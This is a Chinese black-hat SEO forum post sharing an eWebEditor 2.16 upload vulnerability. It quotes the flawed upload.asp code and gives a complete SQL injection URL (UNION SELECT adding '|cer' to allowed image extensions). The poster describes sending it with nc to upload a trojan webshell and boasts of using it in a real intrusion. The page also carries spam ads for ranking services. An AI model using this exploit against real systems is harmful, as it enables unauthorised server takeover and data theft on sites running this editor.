黑帽SEO技术论坛|商业源码|棋牌资源网

 找回密码
 立即注册

QQ登录

只需一步,快速开始

扫一扫,访问微社区

寄生虫排名恢复 需要排名的加我QQ:774558241诚信经营 非诚勿扰 文字广告位招租 80元/月 文字广告位招租 80元/月 文字广告位招租 80元/月
文字广告位招租 80元/月 文字广告位招租 80元/月 文字广告位招租 80元/月 文字广告位招租 80元/月
查看: 1989|回复: 0

ewebeditor 2.16 上传漏洞 0day利用

[复制链接]

1674

主题

1690

帖子

8692

积分

超级版主

Rank: 18Rank: 18Rank: 18Rank: 18Rank: 18

积分
8692
发表于 2017-3-3 17:18:30 | 显示全部楼层 |阅读模式
摘要:union select控制ewebeditor上传文件后缀 216版的ewebeditor 存在一个注入漏洞 之后一个版也存在这样的问题 前段时间拉至尊宝渗透一内网时发现这个东西 无后台 无法登陆 默认数据库 但用处也不大 所以就深刻研究了下这个注入 发现可以通过union 来控制允许上...

union select控制ewebeditor上传文件后缀
216版的ewebeditor 存在一个注入漏洞 之后一个版也存在这样的问题
前段时间拉至尊宝渗透一内网时发现这个东西
无后台 无法登陆 默认数据库 但用处也不大
所以就深刻研究了下这个注入 发现可以通过union 来控制允许上传类型的列表
随后时间成功利用此漏洞拿了不少东西 分享下
漏洞文件是upload.asp
Sub InitUpload()
sType = UCase(Trim(Request.QueryString("type")))
sStyleName = Trim(Request.QueryString("style"))
sSql = "select * from ewebeditor_style where s_name='" & sStyleName &
"'"
oRs.Open sSql, oConn, 0, 1
If Not oRs.Eof Then
sUploadDir = oRs("S_UploadDir")
sUploadDir = Replace(sUploadDir, "\", "/")
If Right(sUploadDir, 1) <> "/" Then
sUploadDir = sUploadDir & "/"
End If

Select Case sType
Case "FILE"
sAllowExt = oRs("S_FileExt")
nAllowSize = oRs("S_FileSize")
Case "MEDIA"
sAllowExt = oRs("S_MediaExt")
nAllowSize = oRs("S_MediaSize")
Case "FLASH"
sAllowExt = oRs("S_FlashExt")
nAllowSize = oRs("S_FlashSize")
Case Else
sAllowExt = oRs("S_ImageExt")
nAllowSize = oRs("S_ImageSize")
End Select
Else
OutScript("parent.UploadError('无效的样式ID号,请通过页面上的链接进行操作!')")
End If
oRs.Close
' 任何情况下都不允许上传asp脚本文件
sAllowExt = Replace(UCase(sAllowExt), "ASP", "")
End Sub
sStyleName变量是直接从style中读取到没有经过任何过滤
我们要做的就是通过 union 增加一个 sAllowExt类型 构造
upload.asp?action=save&type=IMAGE&style=fox' union select
S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileE&shy;xt,S_FlashExt,
[S_ImageExt]+'|
cer',S_MediaExt,S_RemoteExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,&shy;S_RemoteSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl,S_UploadObje&shy;ct,S_AutoDir,S_BaseHref,S_ContentPath,S_AutoRemote,S_ShowBorder
from ewebeditor_style where s_name='standard' and 'a'='a


union要之前的select结果为空(这个好办)
同时要知道字段数(下载到数据库查也能查到了)
我使用[S_ImageExt]+'|cer'使S_ImageExt中加入"|cer"串。
用NC发包就可以上传木马了。



回复

使用道具 举报

*滑动验证:
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|Archiver|手机版|小黑屋|黑帽SEO技术论坛|商业源码|棋牌资源网  |网站地图

Powered by Discuz! X3.3© 2001-2013 Comsenz Inc.

快速回复 返回顶部 返回列表